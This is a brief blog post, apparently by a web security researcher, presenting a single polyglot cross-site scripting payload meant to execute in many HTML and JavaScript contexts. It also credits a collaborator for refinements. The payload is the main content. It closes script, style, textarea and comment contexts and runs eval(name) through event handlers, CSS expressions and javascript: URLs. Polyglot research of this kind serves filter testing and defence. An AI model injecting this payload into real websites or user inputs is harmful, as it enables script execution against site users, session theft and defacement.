Published 15 years 8 months ago • Last updated March 26, 2025 • ⏱️ < 1 min read
I set myself a fun challenge to create a vector that would execute in many contexts. The idea being that it should work regardless where it's placed. For example:-
"xss" 'xss' <tag alt="xss">
As an added challenge I tried to execute only the one payload and where possible to use a single eval. I had to use multiple evals as the contexts increased because for stuff like background= etc there was no way I could figure reusing the existing one :( So I had around 19 then got bored.
One vector to xss them all, one vector to find them, One vector to bring them all and in the darkness bind them.
javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression(/*'/-/*',/**/eval(name)/*%2A///*///);width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"
Updated added new vectors and removed any that weren't required. Thanks to @LeverOne!!
2nd Update...Fixed comments, added name to [] rule so it executes without window.name for dom rules. Thanks again for some fixes by @LeverOne